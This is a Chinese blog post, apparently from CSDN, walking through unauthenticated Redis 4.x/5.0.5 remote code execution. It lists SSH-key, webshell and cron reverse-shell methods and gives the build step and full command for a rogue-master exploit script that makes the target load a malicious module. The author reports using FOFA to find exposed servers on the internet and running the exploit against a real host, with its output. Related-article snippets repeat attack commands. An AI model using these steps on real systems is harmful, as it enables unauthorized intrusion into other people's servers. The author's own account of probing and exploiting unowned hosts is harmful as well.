Redis 4.x/5.0.5以前未授权访问rce

最新推荐文章于 2024-05-09 00:07:21 发布
最新推荐文章于 2024-05-09 00:07:21 发布
阅读量766 收藏
点赞数 1
分类专栏: web渗透 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/111599250
版权

Redis 4.x/5.0.5以前未授权访问rce

关于redis未授权访问漏洞,网上已经有一大堆的利用方式了,
默认端口:6379,未授权密码一般为空,也有可能存在弱口令
未授权访问利用方式基本分为三种~~
第一种:ssh免密登录

  • 需要开启ssh服务
  • 需要/root/.ssh或其他.ssh能写入

第二种:直接写入webshell

  • 开启web服务
  • 需要知道网站绝对路径
  • 具有对文件操作的权限

第三种:定时任务反弹shell

  • 需要root权限
  • 知道定时计划的路径,如/var/spool/cron

用fofa搜了一波,其实是存在很多redis未授权的:
在这里插入图片描述
直接使用redis-cli -h x.x.x.x即可连接进入,输入info:
在这里插入图片描述
真实环境,连接看看就行,,,,,
回到正题:Redis 4.x/5.0.5以前未授权访问rce漏洞
原理:Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
利用脚本:https://github.com/vulhub/redis-rogue-getshell
使用之前需要编译一下生成exp.so:

cd RedisModulesSDK/
make

之后便可执行脚本:

python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "whoami"

这里利用fofa找到一个版本相符合的(版本符合也不一定能执行命令),版本4.0.11:
在这里插入图片描述
运行脚本,可以得到命令执行的结果:
在这里插入图片描述
真实环境,点到为止~~
有啥描述得不对的地方,欢迎各位大佬指出~~

A_dmins
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Redis-主从复制
shui2104的博客
09-27 226
Redis-主从复制 ​ 为了避免单点Redis服务器故障,准备多台服务器,相互连通。将数据多个副本保存在不同的服务器上,连接在一起,并保证数据是同步的。即使其中某一台服务器宕机,其他服务器依然可以继续提供服务,实现Redis的高可用,同时实现数据冗余备份。 ​ 主从复制即将master中的数据有效及时的复制到slave中。一个master可以对应多个slave,一个slave只能对应一个master。 master:复制写数据,执行写操作时,将出现变化的数据自动同步到slave。读数据的操作基本可忽略
redis-5.0.5.tar.gz
03-07
redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-5.0.5.redis-...
Redis授权访问
最新发布
npc88888的博客
05-09 1203
在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的。更改目标服务器Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh。原文链接:https://blog.csdn.net/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。
Redis 4.x RCE 复现学习
weixin_30376453的博客
07-28 213
攻击场景: 能够访问远程redis的端口(直接访问或者SSRF) 对redis服务器可以访问到的另一台服务器有控制权 实际上就是通过主从特性来 同步传输数据,同时利用模块加载来加载恶意的用来进行命令执行的函数,从而进行rce redis之前的攻击方法有 1.写shell CONFIG SET dir /VAR/WWW/HTML CONFIG SET dbfile...
Redis 4.x5.x 授权访问漏洞(RCE
网络安全。
02-14 1385
0x01 简介 Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 0x02 漏洞复现 1、环境启动后,通过redis-cli -h your-ip即可进行连接,可见存在授权访问漏洞。 2、使用如下POC即可直接执行命令。 工具地址:https://github.com/vulhub/redis-rogu...
redis主从rceredis5.0版本下rce的不同
五分之一世纪
08-08 494
文章目录(1)redis遵循的两种脚本协议【1】明文(plaintext)【2】序列化(custom)【3】分析(2)实现rce的方法【1】不持久的RCE【2】一般情况下的持久的RCE【3】5.0版本下持久的RCE 学习redis主从漏洞你一定要知道的知识点 (1)redis遵循的两种脚本协议 【1】明文(plaintext) example: SET keyname value\n 【2】序列化(custom) example: *3\r\n$3\r\nSET\r\n$7\r\nkeyname\r\n$5
redis-5.0.5.zip windows版本
06-15
因为工作需要使用redis,需要临时搭建单机环境,但是windows下支持的版本过低,因此编译了一个windows可用的5.0.5的redis版本
Redis3.x和Redis4.x的Windows版.zip
06-16
Windows版Redis3.x、Redis4.x
redis 5.X版本,redis 5.X版本
03-29
redis 5.X版本redis 5.X版本redis 5.X版本redis 5.X版本redis 5.X版本redis 5.X版本
Redis基于主从复制的RCE 4.x/5.x 复现
weixin_30408165的博客
07-12 413
0x00 前言 最近期末考试,博客好久没有更新了,这段时间爆了三四个洞,趁着还没去实习,抓紧复现一下,这次复现的是RedisRCE,复现过程中也遇到很多问题,记录下来和大家分享一下 0x01 拉取镜像 docker确实是个好东西,有了它复现节省不少时间,首先拉取一个5.0镜像 docker search redis5.0 //查找镜像docker pull damonev...
redis4.0x5.0x-远程命令漏洞利用exp.rar
07-09
redis4.0x5.0x-远程命令漏洞利用exp 2019年7月9日版,仅用来学习测试,不可用于非法用途,谢谢配合,实测可用
Redis基于主从复制的RCE(redis4.x 5.x)复现
ddr12231的博客
07-10 249
使用docker建立redis 拉取镜像 运行 查看 可以连接,存在授权 https://github.com/Ridter/redis-rce 发送poc i:正向连接 r:反弹 反弹成功 转载于:https://www.cnblogs.com/mrhonest/p/11162735.html...
Redis授权漏洞利用
tangshuangsss的专栏
01-04 616
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,...
Redis授权访问漏洞复现及利用
Lilin's博客
03-20 620
Redis授权访问漏洞复现及利用Redis相关介绍应用场景常用语法漏洞复现环境搭建Centos 7 环境配置安装Apache安装PHP安装Redis漏洞利用准备kali安装Rediswindows安装Redis授权访问漏洞利用webshell反弹shell写公钥主从复制RCE预防措施其他问题 Redis相关介绍 Redis是完全开源的,遵守BSD协议,是一个高性能的key-value数据库。 应用场景 在Java web中主要有两个应用场景: 存储、缓存用的数据 需要高速读写的场合使用它快速读写 常
Redis 4.x/5.x授权访问漏洞(以及一些环境搭建的坑)(7月18更新)
来到了学渣的博客
05-01 1630
Redis是什么? Redis是数据库,一个高性能的key-value存储系统,是使用ANSI C语言编写的。 Redis授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的...
Redis漏洞利用总结
YouthBelief的博客
10-29 5694
redis漏洞利用前言一、redis4.x`5.x授权访问漏洞0x01 漏洞描述0x02 影响范围0x03 环境搭建0x03 漏洞利用探测漏洞授权登录3.1 利用redis写webshell利用前提利用方法3.2 利用“公私钥” 认证获取root权限3.3 利用crontab反弹shell0x04 漏洞修复 前言 redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis默认使用 6379 端口。 一、redis4
【简单复现】Redis 4.x/5.x 授权访问漏洞
qq_45751902的博客
10-06 1061
开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限(我们可以将dir设置为一个目录A,而dbfilename为文件名B,再执行save或bgsave,则我们就可以写入一个路径为/A/B的任意文件。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,因为是实验环境,靶机端口没有改,redis密码没有设置(设置的话,需要爆破)等,这样将会将Redis服务暴露到公网上,如果在没有设置。
Redis远程命令执行漏洞修复方法(CNVD-2019-21763)
zhangyuxun3的博客
03-30 3267
漏洞详情: 近日,Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞,攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,风险较高。目前漏洞的利用方式已被公开。 漏洞评级: 高危漏洞 影响范围: Redis版本 >=4.0、>=5.0 漏洞复现 安装最新版 redis (5.0.5)并正常启动: 在攻击机上执行EXP,同时可以看到服务器上的日志输出: 成功后可以执行任意命令: 修复方案 (由于目前Redis厂商发布正式版本的修复
给这段配置文件添加注释services: ruoyi-redis: container_name: ruoyi-redis image: redis build: context: ./redis ports: - "9063:6379" volumes: - ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf - ./redis/data:/data command: redis-server /home/ruoyi/redis/redis.conf
06-09
- ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf # Redis配置文件映射 - ./redis/data:/data # Redis数据目录映射 command: redis-server /home/ruoyi/redis/redis.conf # 启动Redis服务的命令 ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值